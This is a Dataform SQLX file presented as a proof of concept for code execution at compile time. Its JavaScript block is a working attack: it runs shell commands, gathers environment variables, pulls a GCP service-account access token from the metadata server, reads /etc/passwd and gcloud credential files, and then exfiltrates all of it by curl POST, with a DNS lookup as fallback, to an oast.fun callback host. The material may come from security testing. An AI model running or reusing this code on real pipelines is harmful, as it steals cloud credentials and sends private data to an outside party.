-- Dataform SQLX JavaScript Execution PoC
-- Tests if JavaScript executes during compilation with access to Node.js APIs

config {
  type: "view",
  name: "ace_poc_results"
}

js {
  // Helper to base64 encode results for safe output
  const b64 = (str) => {
    try {
      return Buffer.from(String(str)).toString('base64');
    } catch(e) {
      return 'ENCODE_ERROR';
    }
  };

  // Results object to collect all test outcomes
  let results = {
    timestamp: new Date().toISOString(),
    whoami: "NOT_TESTED",
    id_output: "NOT_TESTED",
    env_vars: "NOT_TESTED",
    gcp_token: "NOT_TESTED",
    gcp_email: "NOT_TESTED",
    fs_read: "NOT_TESTED",
    network_test: "NOT_TESTED"
  };

  // Test 1: Command execution via child_process
  try {
    const cp = require('child_process');
    results.whoami = cp.execSync('whoami').toString().trim();
    results.id_output = cp.execSync('id').toString().trim();
  } catch (e) {
    results.whoami = 'BLOCKED: ' + e.message;
  }

  // Test 2: Environment variable access
  try {
    // Capture interesting env vars (GCP credentials often here)
    const interestingVars = ['GOOGLE_APPLICATION_CREDENTIALS', 'CLOUDSDK_AUTH_ACCESS_TOKEN',
                            'GCP_PROJECT', 'GOOGLE_CLOUD_PROJECT', 'HOME', 'USER'];
    let envSnapshot = {};
    for (const v of interestingVars) {
      if (process.env[v]) envSnapshot[v] = process.env[v];
    }
    // Also capture all env var names (not values for brevity)
    envSnapshot._all_keys = Object.keys(process.env);
    results.env_vars = JSON.stringify(envSnapshot);
  } catch (e) {
    results.env_vars = 'BLOCKED: ' + e.message;
  }

  // Test 3: GCP Metadata Service Access (credential theft)
  try {
    const cp = require('child_process');
    // Try to get access token from metadata service
    const tokenCmd = "curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' 2>&1";
    results.gcp_token = cp.execSync(tokenCmd, {timeout: 5000}).toString().trim();

    // Also get service account email
    const emailCmd = "curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email' 2>&1";
    results.gcp_email = cp.execSync(emailCmd, {timeout: 5000}).toString().trim();
  } catch (e) {
    results.gcp_token = 'BLOCKED: ' + e.message;
  }

  // Test 4: File system read access
  try {
    const fs = require('fs');
    // Try to read common credential locations
    const paths = [
      '/etc/passwd',
      process.env.HOME + '/.config/gcloud/credentials.db',
      process.env.HOME + '/.config/gcloud/application_default_credentials.json'
    ];
    let fsResults = {};
    for (const p of paths) {
      try {
        const content = fs.readFileSync(p, 'utf8');
        fsResults[p] = content.substring(0, 200) + '...'; // First 200 chars
      } catch (e) {
        fsResults[p] = 'ERROR: ' + e.code;
      }
    }
    results.fs_read = JSON.stringify(fsResults);
  } catch (e) {
    results.fs_read = 'BLOCKED: ' + e.message;
  }

  // Test 5: Outbound network + exfiltration
  try {
    const cp = require('child_process');
    // Exfiltrate all results to OAST endpoint
    const payload = JSON.stringify(results);
    const exfilCmd = `curl -s -X POST -H 'Content-Type: application/json' -d '${payload.replace(/'/g, "\\'")}' 'https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/sqlx'`;
    cp.execSync(exfilCmd, {timeout: 10000});
    results.network_test = 'EXFIL_SUCCESS';
  } catch (e) {
    results.network_test = 'BLOCKED: ' + e.message;
    // DNS fallback
    try {
      const cp = require('child_process');
      cp.execSync(`nslookup sqlx-fallback.juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun`, {timeout: 5000});
    } catch(e2) {}
  }
}

-- Output results as SQL comment for visibility in compiled output
-- Results are base64 encoded to handle special characters

SELECT
  '${b64(results.timestamp)}' as poc_timestamp,
  '${b64(results.whoami)}' as whoami_b64,
  '${b64(results.id_output)}' as id_b64,
  '${b64(results.env_vars)}' as env_b64,
  '${b64(results.gcp_token)}' as gcp_token_b64,
  '${b64(results.gcp_email)}' as gcp_email_b64,
  '${b64(results.fs_read)}' as fs_read_b64,
  '${b64(results.network_test)}' as network_b64

/*
=== DATAFORM SQLX JAVASCRIPT EXECUTION POC ===
Timestamp: ${results.timestamp}
Whoami: ${results.whoami}
ID: ${results.id_output}
GCP Token: ${results.gcp_token.substring(0, 100)}...
GCP Email: ${results.gcp_email}
Network Test: ${results.network_test}
==============================================
*/
